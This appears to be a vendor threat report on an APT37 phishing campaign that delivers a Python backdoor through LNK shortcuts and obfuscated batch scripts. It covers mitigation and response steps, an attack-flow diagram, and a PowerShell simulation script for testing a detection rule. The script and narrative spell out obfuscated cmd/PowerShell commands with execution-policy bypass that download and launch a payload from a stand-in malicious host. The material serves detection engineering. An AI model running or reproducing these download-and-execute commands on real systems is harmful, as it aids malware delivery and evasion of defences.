Python Backdoor Threat Analysis Following an AI Deepfake Impersonation Campaign

SOC Prime Team

Python Backdoor Threat Analysis Following an AI Deepfake Impersonation Campaign

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

The report outlines a multi-stage intrusion campaign linked to the North Korean APT37 group. Initial access begins with spear-phishing emails that carry ZIP archives containing malicious LNK shortcut files. When opened, the LNK launches an obfuscated batch script that downloads additional components and eventually deploys a Python-based backdoor disguised as a .cat file.

Investigation

Researchers observed heavy command obfuscation through environment-variable substring expansion, along with abuse of legitimate tools such as curl.exe and an embedded Python 3.10 runtime. The malware also created a scheduled task to maintain persistence on the host. Investigators identified infrastructure overlaps with earlier APT37 operations, including use of Cafe24 hosting and French .fr domains.

Mitigation

Organizations should harden email defenses, block execution of LNK files extracted from archives, and monitor for unusual batch-script obfuscation patterns. Defenders should also watch for curl.exe and pythonw.exe running from unexpected paths and alert on suspicious scheduled task creation. Behavioral analytics should correlate these process chains with outbound connections to the known command-and-control infrastructure.

Response

If this activity is detected, isolate the affected system, terminate the malicious processes, remove the scheduled task, and delete the dropped Python files. Security teams should also conduct a forensic hunt for related batch scripts, LNK shortcut files, and any exposed credentials. Detection logic should be updated to cover the observed command-line patterns and network indicators.

graph TB %% Class definitions classDef action fill:#99ccff classDef technique fill:#c2f0c2 classDef tool fill:#cccccc classDef process fill:#ffcc99 classDef file fill:#ffff99 classDef persistence fill:#d9b3ff classDef c2 fill:#ff9999 %% Nodes action_phishing[“Action – T1566.001 Spearphishing Attachment A ZIP archive containing a malicious .lnk shortcut is sent by email.”] class action_phishing action file_zip[“File – ZIP archive Contains the malicious shortcut (lnk).”] class file_zip file file_lnk[“File – Shortcut (lnk) Used for User Execution and later as a logon autostart.”] class file_lnk file technique_user_exec[“Technique – T1204.002 User Execution Victim opens the shortcut, causing the chain to start.”] class technique_user_exec technique process_cmd[“Process – cmd.exe Reconstructs the real command using environment‑variable substring expansion.”] class process_cmd process technique_obfuscation[“Technique – T1027.010 Command Obfuscation Obfuscates the command before reconstruction.”] class technique_obfuscation technique technique_decode[“Technique – T1140 Deobfuscate/Decode Files Decodes the reconstructed command string.”] class technique_decode technique process_powershell[“Process – PowerShell Executes the decoded command and invokes curl.exe.”] class process_powershell process tool_curl[“Tool – curl.exe Legitimate system binary used to download additional payloads.”] class tool_curl tool technique_proxy_exec[“Technique – T1218.002 Signed Binary Proxy Execution: Control Panel Uses a trusted binary to proxy execution.”] class technique_proxy_exec technique technique_software_ext[“Technique – T1176 Software Extensions Leveraging curl.exe as a software extension.”] class technique_software_ext technique file_bat[“File – BAT loader Obfuscated batch script that downloads a Python‑embed package.”] class file_bat file tool_pythonw[“Tool – pythonw.exe (renamed to codeflush.exe) Runs the embedded Python payload stealthily.”] class tool_pythonw tool file_payload[“File – Compiled Python payload disguised as .cat Contains the backdoor functionality.”] class file_payload file persistence_task[“Persistence – T1053 Scheduled Task Task named \”MicrosoftMusicLibrariesPackageTaskMachine\” repeatedly runs codeflush.exe.”] class persistence_task persistence technique_shortcut_mod[“Technique – T1547.009 Shortcut Modification The initial .lnk also serves as a logon autostart entry.”] class technique_shortcut_mod technique malware_backdoor[“Malware – Python backdoor (Remote Access Tools) Communicates with C2, receives Base64 commands, executes them and returns results.”] class malware_backdoor c2 %% Connections action_phishing –>|delivers| file_zip file_zip –>|contains| file_lnk file_lnk –>|triggers| technique_user_exec technique_user_exec –>|executes| process_cmd process_cmd –>|applies| technique_obfuscation process_cmd –>|applies| technique_decode process_cmd –>|launches| process_powershell process_powershell –>|uses| tool_curl tool_curl –>|leverages| technique_proxy_exec tool_curl –>|leverages| technique_software_ext process_powershell –>|downloads| file_bat file_bat –>|downloads| tool_pythonw tool_pythonw –>|renames to| codeflush_exe[“File – codeflush.exe (renamed pythonw)”] codeflush_exe –>|loads| file_payload file_payload –>|provides| malware_backdoor malware_backdoor –>|establishes| c2[“Command & Control”] malware_backdoor –>|creates| persistence_task persistence_task –>|ensures execution of| codeflush_exe file_lnk –>|adds| technique_shortcut_mod technique_shortcut_mod –>|persists via logon shortcut| persistence_task %% Class assignments for edges (optional styling) class process_cmd process class process_powershell process class codeflush_exe process

Attack Flow

Attack Narrative & Commands

Goal: The adversary wants to download a second‑stage payload from an external server while evading simple command‑line bans.
Method: Deploy a malicious .lnk file that, when clicked, launches cmd.exe /k to set a series of environment variables that piece together an obfuscated PowerShell command. The assembled command runs PowerShell with -ExecutionPolicy Bypass and uses curl.exe to fetch the payload.
Steps:
- a. Create environment variables that store fragments of the final command (e.g., a=%SystemRoot%, b=%SystemRoot%System32, c=PowerShell, etc.).
- b. Execute cmd.exe /k "%a%System32%c% -ExecutionPolicy Bypass -Command "& { iwr -Uri 'http://malicious.example/payload.exe' -OutFile $env:TEMPupd.exe; Start-Process $env:TEMPupd.exe }""
- c. The curl.exe variant replaces iwr with curl.exe for the same download.

The resulting Event ID 1 Sysmon record will contain an Image of cmd.exe and a CommandLine matching /k plus the PowerShell bypass string, satisfying the rule.

Regression Test Script

# --------------------------------------------------------------
# Simulation Script – Triggers the Sigma rule
# --------------------------------------------------------------
# 1. Define obfuscated fragments via environment variables
$env:V1 = "$env:SystemRoot"
$env:V2 = "System32"
$env:V3 = "PowerShell"
$env:V4 = "-ExecutionPolicy"
$env:V5 = "Bypass"
$env:V6 = "-Command"
$env:V7 = "`"& { iwr -Uri 'http://malicious.example/payload.exe' -OutFile $env:TEMPupd.exe; Start-Process $env:TEMPupd.exe }`""

# 2. Build the full command line (still obfuscated)
$cmd = "$env:V1$env:V2cmd.exe /k `"$env:V1$env:V2$env:V3 $env:V4 $env:V5 $env:V6 $env:V7`""

# 3. Execute the command – this will generate the Sysmon event
Start-Process -FilePath "$env:V1$env:V2cmd.exe" -ArgumentList "/k `"$env:V1$env:V2$env:V3 $env:V4 $env:V5 $env:V6 $env:V7`"" -NoNewWindow
# --------------------------------------------------------------

Cleanup Commands

# Remove temporary environment variables
Remove-Item Env:V1, Env:V2, Env:V3, Env:V4, Env:V5, Env:V6, Env:V7 -ErrorAction SilentlyContinue

# Delete the downloaded dummy payload if it exists
Remove-Item -Path "$env:TEMPupd.exe" -Force -ErrorAction SilentlyContinue

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free